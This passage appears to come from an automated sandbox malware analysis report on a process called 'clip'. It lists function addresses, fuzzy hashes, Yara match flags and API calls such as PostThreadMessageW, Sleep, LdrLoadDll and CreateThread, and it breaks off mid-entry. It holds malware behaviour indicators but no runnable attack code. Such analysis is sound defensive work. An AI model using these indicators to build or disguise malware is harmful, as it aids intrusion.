                            Uniqueness Score: -1.00%

                            Function 04C62C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 49dff781945baa36fb0dc0eb959f38aa8ba330d9e062746a8ecff835f9b4b523
                            • Instruction ID: c5b92a69d59b2b4ea268001e7f5ceea6db1eabafe116bb8ad3fd54712a143b0d
                            • Opcode Fuzzy Hash: 49dff781945baa36fb0dc0eb959f38aa8ba330d9e062746a8ecff835f9b4b523
                            • Instruction Fuzzy Hash: 6E90027120148803F1107158840874A10068BD0715F59C431A5425658D8695D9917131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 56b45df215d24274edc7ccbb72218faa8cb7d5a6fceacb883784dd291f391ba1
                            • Instruction ID: fbca3194e6e26fbff650bd04d363e1b0d00f4a022cf3ae3f10be543af7d34359
                            • Opcode Fuzzy Hash: 56b45df215d24274edc7ccbb72218faa8cb7d5a6fceacb883784dd291f391ba1
                            • Instruction Fuzzy Hash: 2C900261242441537545B158440850750079BE0655795C032A2415950C8526E956D631
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 67bbd0041727509714d869ff7c389fdafb8d21508d3692cc5f6631020ba5c7c2
                            • Instruction ID: 5c8bb5fbe1f13848963249bf951a2ba8e7f92df6922df6671afb08f431e7eef8
                            • Opcode Fuzzy Hash: 67bbd0041727509714d869ff7c389fdafb8d21508d3692cc5f6631020ba5c7c2
                            • Instruction Fuzzy Hash: CA90027120140413F11171584508707100A8BD0655F95C432A1425558D9656DA52A131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ad9f56a590d8c1c4a790c6514908e2e5e25beebf22209cc310664e8e993cb1e8
                            • Instruction ID: 49163823b9a6aff8493740e0f6b960f90914915a557a61e11a498f05c9e62142
                            • Opcode Fuzzy Hash: ad9f56a590d8c1c4a790c6514908e2e5e25beebf22209cc310664e8e993cb1e8
                            • Instruction Fuzzy Hash: 4590026921340003F1807158540C60A10068BD1616F95D435A1016558CC915D9695331
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f21d189dd66c2093780b138e1596a95ff1c9ee8849573244438cade869fe2095
                            • Instruction ID: 314973996a58a173808afedf840ad74f8d7695f7e939fe818dbb9695b2f8c04c
                            • Opcode Fuzzy Hash: f21d189dd66c2093780b138e1596a95ff1c9ee8849573244438cade869fe2095
                            • Instruction Fuzzy Hash: 6590047130140003F140715C541C7075007DFF1715F55D031F1415554CDD15DD575333
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ed307bb1292154276ee913602318226ed37fe04715b378d5c5aa40915df10e29
                            • Instruction ID: 7d87700b549d68572fadf0de2171c3d882eeec08550b97a238d7233fb249ec99
                            • Opcode Fuzzy Hash: ed307bb1292154276ee913602318226ed37fe04715b378d5c5aa40915df10e29
                            • Instruction Fuzzy Hash: 3A9002A120180403F1407558480860710068BD0716F55C031A3065555E8A29DD516135
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 3c156265ca42f9b64ac36468e2c2d0b8bfeb629856b7ac330ec09b5238909df2
                            • Instruction ID: 4d39715bc8cc888ace857a9cf8ecde05e5a3cfc2bdd9f8b9e5ac3dd03f2a3bbe
                            • Opcode Fuzzy Hash: 3c156265ca42f9b64ac36468e2c2d0b8bfeb629856b7ac330ec09b5238909df2
                            • Instruction Fuzzy Hash: 7990026160140503F10171584408616100B8BD0655F95C032A2025555ECA25DA92A131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c9840853757e1a23cefc6e312c000322cdc31bc78ce99658c3dc968eca4b3eea
                            • Instruction ID: 82b0fbb602e2dc4173202074dc972eec57ff9b56f1f742f47bff0977a425bcdd
                            • Opcode Fuzzy Hash: c9840853757e1a23cefc6e312c000322cdc31bc78ce99658c3dc968eca4b3eea
                            • Instruction Fuzzy Hash: 36900261601400436140716888489065006AFE1625755C131A1999550D8559D9655675
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: cec6fa6c08d4aa10e3a073ac52a2cd1e261b994f2eb4ab98df71b630cde0287a
                            • Instruction ID: bef00957fcd42abddba4e3d310bb875255455841bf44ccc4e50c432d12b7181d
                            • Opcode Fuzzy Hash: cec6fa6c08d4aa10e3a073ac52a2cd1e261b994f2eb4ab98df71b630cde0287a
                            • Instruction Fuzzy Hash: BC9002A134140443F10071584418B061006CBE1715F55C035E2065554D8619DD526136
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C639B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 049c838e6d165e558fc9143710fe16d245d6a4f911df25a21081239ae89a9cf5
                            • Instruction ID: b9c61ceedc8ebe46b554abab0d2417adce987e276387c9a605fe10f5092cc078
                            • Opcode Fuzzy Hash: 049c838e6d165e558fc9143710fe16d245d6a4f911df25a21081239ae89a9cf5
                            • Instruction Fuzzy Hash: BB90026124545103F150715C44086165006ABE0615F55C031A1815594D8555D9556231
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 3b171e26699c4df11ff4eb3c904a8b07b82ec828368b26f35fe2006c15b31068
                            • Instruction ID: 731edcbbc887b8d2faab80da64eca6f47f7a61c0a4b090bb7c690252cd199f52
                            • Opcode Fuzzy Hash: 3b171e26699c4df11ff4eb3c904a8b07b82ec828368b26f35fe2006c15b31068
                            • Instruction Fuzzy Hash: CF90027120544843F14071584408A4610168BD0719F55C031A1065694D9625DE55B671
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ebf4c2187a9152f2b6aa39527f6cd49117a2939a60a8a800330534c45bb56469
                            • Instruction ID: 8662e7897f02db05189923b6864469299b246b06dae11e36f7eff94ff0994d50
                            • Opcode Fuzzy Hash: ebf4c2187a9152f2b6aa39527f6cd49117a2939a60a8a800330534c45bb56469
                            • Instruction Fuzzy Hash: 4790027120140803F1807158440864A10068BD1715F95C035A1026654DCA15DB5977B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 346dd039d4542e136c64657efe39729d6e1a7727bce84dc06a0c1deff892bce8
                            • Instruction ID: f49ed1b9d118bb95a2af61783ca18b0b15aef5b6f3b871e89e9ad4c4aceb61a0
                            • Opcode Fuzzy Hash: 346dd039d4542e136c64657efe39729d6e1a7727bce84dc06a0c1deff892bce8
                            • Instruction Fuzzy Hash: 819002A120240003610571584418616500B8BE0615B55C031E2015590DC525D9916135
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D03D7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 111 9d03d7-9d03e8 112 9d03ea-9d03f2 111->112 113 9d0445-9d0451 111->113 114 9d03f4-9d03ff 112->114 115 9d0387-9d0394 112->115 116 9d04a0-9d04b4 call 9e97b0 call 9ea1c0 113->116 117 9d0453-9d0459 113->117 114->113 119 9d04b5 116->119 118 9d045b-9d0487 117->118 117->119 122 9d04bf-9d04fe call 9d3e60 call 9c1410 call 9e0bc0 119->122 123 9d04b7-9d04bb 119->123 132 9d0520-9d0525 122->132 133 9d0500-9d0511 PostThreadMessageW 122->133 123->122 133->132 134 9d0513-9d051d 133->134 134->132
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -507JlJ26-$-507JlJ26-
                            • API String ID: 0-3526009599
                            • Opcode ID: 944a2329b6273410688a7fa4d9f7ac0b162a7ecddab8ac451d69cd034aae71d8
                            • Instruction ID: d67563b36e9373a186cf24a2006d4e4a86b0648c1d250e77ced724b2e4d3c029
                            • Opcode Fuzzy Hash: 944a2329b6273410688a7fa4d9f7ac0b162a7ecddab8ac451d69cd034aae71d8
                            • Instruction Fuzzy Hash: 0D315A31845315AFCB129BB4DC82F8EBBB4EFC2710F048299FA559B691E7345902CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D040F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 77threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 135 9d040f-9d0435 136 9d0437-9d0438 135->136 137 9d0492-9d04b5 call 9e97b0 call 9ea1c0 135->137 144 9d04bf-9d04fe call 9d3e60 call 9c1410 call 9e0bc0 137->144 145 9d04b7-9d04bb 137->145 152 9d0520-9d0525 144->152 153 9d0500-9d0511 PostThreadMessageW 144->153 145->144 153->152 154 9d0513-9d051d 153->154 154->152
                            APIs
                            • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 009D050D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: -507JlJ26-$-507JlJ26-
                            • API String ID: 1836367815-3526009599
                            • Opcode ID: 3d4214efb1d830ceca408e7e2423dc3222b06fb0241ab6b61513b13ca4200295
                            • Instruction ID: cac1af7ba65518de7d3f933ebd4c8e38820edb0fccbdd60a51fec3c91d6265be
                            • Opcode Fuzzy Hash: 3d4214efb1d830ceca408e7e2423dc3222b06fb0241ab6b61513b13ca4200295
                            • Instruction Fuzzy Hash: 2A117F31D4424876EF2197A58C41FDFBF7C9F82B10F148269FA047B2C2E7756A028BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D0488 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 155 9d0488-9d04b5 call 9e97b0 call 9ea1c0 162 9d04bf-9d04fe call 9d3e60 call 9c1410 call 9e0bc0 155->162 163 9d04b7-9d04bb 155->163 170 9d0520-9d0525 162->170 171 9d0500-9d0511 PostThreadMessageW 162->171 163->162 171->170 172 9d0513-9d051d 171->172 172->170
                            APIs
                            • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 009D050D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: -507JlJ26-$-507JlJ26-
                            • API String ID: 1836367815-3526009599
                            • Opcode ID: c76fe7fcba97b74889142dc2b0896d49256be01c2a3d9fc97281962d85b8a425
                            • Instruction ID: fee1f49409245b1c2938503e8f1760f0173f0146bfb272e6d6859e8e819c120a
                            • Opcode Fuzzy Hash: c76fe7fcba97b74889142dc2b0896d49256be01c2a3d9fc97281962d85b8a425
                            • Instruction Fuzzy Hash: 6F11DB71D4125876EB219BA18C42FDF7B7C9F81B50F048155FE047F2C1E6786A068BE6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D0490 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 173 9d0490-9d04b5 call 9e97b0 call 9ea1c0 180 9d04bf-9d04fe call 9d3e60 call 9c1410 call 9e0bc0 173->180 181 9d04b7-9d04bb 173->181 188 9d0520-9d0525 180->188 189 9d0500-9d0511 PostThreadMessageW 180->189 181->180 189->188 190 9d0513-9d051d 189->190 190->188
                            APIs
                            • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 009D050D
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID: -507JlJ26-$-507JlJ26-
                            • API String ID: 1836367815-3526009599
                            • Opcode ID: 03f55208a0ba356919e6cb8b99eaa19c0826e70b78d41d1b44a3914ff9cc2e5b
                            • Instruction ID: 94919bdcb805a14af1c66e1c23b40c68f4388a019f94e26802fb25ff8175b567
                            • Opcode Fuzzy Hash: 03f55208a0ba356919e6cb8b99eaa19c0826e70b78d41d1b44a3914ff9cc2e5b
                            • Instruction Fuzzy Hash: 3B01D671D4121876EB2197A18C42FDF7B7C9F81B50F048155FE047B2C1E6B46A068BE6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E24A0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 191 9e24a0-9e24e8 call 9e9680 194 9e24ee-9e2556 call 9e9760 call 9d3e60 call 9c1410 call 9e0bc0 191->194 195 9e25ec-9e25f2 191->195 204 9e2560-9e2574 Sleep 194->204 205 9e25d9-9e25e0 204->205 206 9e2576-9e257c 204->206 205->204 209 9e25e6 205->209 207 9e257e-9e25a4 call 9e47c0 206->207 208 9e25a6-9e25c7 call 9e4860 206->208 213 9e25cc-9e25cf 207->213 208->213 209->195 213->205
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 009E256B
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: c9329f6f9a1eea2182f4bbb3da3b03329ae5c6ecd83392a0672571f9e8bbe160
                            • Instruction ID: 22530d0eaec27840f8a6b30fecbeda2a248e4e5d1b0f6ec8a2382b0833d6ac26
                            • Opcode Fuzzy Hash: c9329f6f9a1eea2182f4bbb3da3b03329ae5c6ecd83392a0672571f9e8bbe160
                            • Instruction Fuzzy Hash: 5831BEB5601304BBCB15DF65C881FE7BBACEB88700F00852DBA595B281D774BA44CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D3EE0 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 427 9d3ee0-9d3ee9 428 9d3eea-9d3eed 427->428 428->428 429 9d3eef-9d3f0c 428->429 430 9d3f0d-9d3f12 429->430 431 9d3f14-9d3f1a 430->431 432 9d3ea3-9d3ebe call 9e8dd0 430->432 431->430 434 9d3f1c-9d3f1e 431->434 442 9d3ed7-9d3eda 432->442 443 9d3ec0-9d3ed4 LdrLoadDll 432->443 436 9d3f20-9d3f38 434->436 437 9d3f92-9d3fa5 434->437 440 9d3f39-9d3f3e 436->440 437->440 441 9d3fa7-9d3fb2 437->441 440->437 443->442
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6d07ddf5c61a059c4725f55d5e0ee58ef62d9d343b7d2496ea834a12d8d410b6
                            • Instruction ID: dec74ad7bff9d12be6f0296655ab8bb9791f391fb6e6287b8f282ae74e88c67d
                            • Opcode Fuzzy Hash: 6d07ddf5c61a059c4725f55d5e0ee58ef62d9d343b7d2496ea834a12d8d410b6
                            • Instruction Fuzzy Hash: 8B214971D45A1EEFD710DF68CC81BCABBB8EB41311B14869AD4115B392D631AA02CBD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D3E60 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009D3ED2
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: 2e23ba2df3ab8477fb8b61eeeea1e6b596ee27c56ee5641e6f62f0d33d794c3a
                            • Instruction ID: d358b9c86cf817ed919be5d421c7f72bcfd195c24a8a6c869436898d1ae110a1
                            • Opcode Fuzzy Hash: 2e23ba2df3ab8477fb8b61eeeea1e6b596ee27c56ee5641e6f62f0d33d794c3a
                            • Instruction Fuzzy Hash: AE0112B5D4010DA7DB10DBE5DC42F9EB3789B54308F008595A90897291F671EB558B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009C9330 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009C9375
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 11a2af70ae97e9f2fcc8fb59134195a7a46022a73b024c631d498baf74429085
                            • Instruction ID: aa7b8a6bdcf9cf697a99c3fe0b375f39b5b242efc5189bed50bedeb90d4107ef
                            • Opcode Fuzzy Hash: 11a2af70ae97e9f2fcc8fb59134195a7a46022a73b024c631d498baf74429085
                            • Instruction Fuzzy Hash: 7AF06D7378121476E32162AA9C03FD7B38CCBC0B72F14046AF60CEB1C1D995B84182E9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009C932B Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009C9375
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 180500ac00cb17512cc4d997126f103b6725cf0b213d5f038c4d017f5bda3229
                            • Instruction ID: 2e97bc7e3f94f8ec677562a81fa2fc6ff2a73c99ced704a70d02167af2caaf34
                            • Opcode Fuzzy Hash: 180500ac00cb17512cc4d997126f103b6725cf0b213d5f038c4d017f5bda3229
